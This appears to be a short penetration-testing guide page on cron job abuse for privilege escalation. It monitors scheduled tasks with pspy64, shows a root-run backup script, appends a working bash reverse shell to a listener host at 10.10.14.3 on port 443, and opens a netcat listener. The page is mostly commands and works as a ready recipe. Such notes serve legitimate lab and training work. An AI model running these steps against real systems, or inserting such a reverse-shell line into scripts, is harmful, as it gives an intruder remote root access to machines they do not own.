Cron Job Abuse

Sample Exploitation

  1. Use pspy64 to monitor tasks. The -pf flag is for printing commands and file names. The -i 1000 command tells procfs to scan every 1000ms

    $ ./pspy64 -pf -i 1000

  2. View backup.sh

    $ cat /dmz-backups/backup.sh 

#!/bin/bash
 SRCDIR="/var/www/html"
 DESTDIR="/dmz-backups/"
 FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
 tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR

  3. Edit backup.sh and add a reverse shell at the end

    #!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1

  4. Make sure to ready a listener

    $ nc -lnvp 443
PreviousVulnerable ServicesNextLXD/LXC

Last updated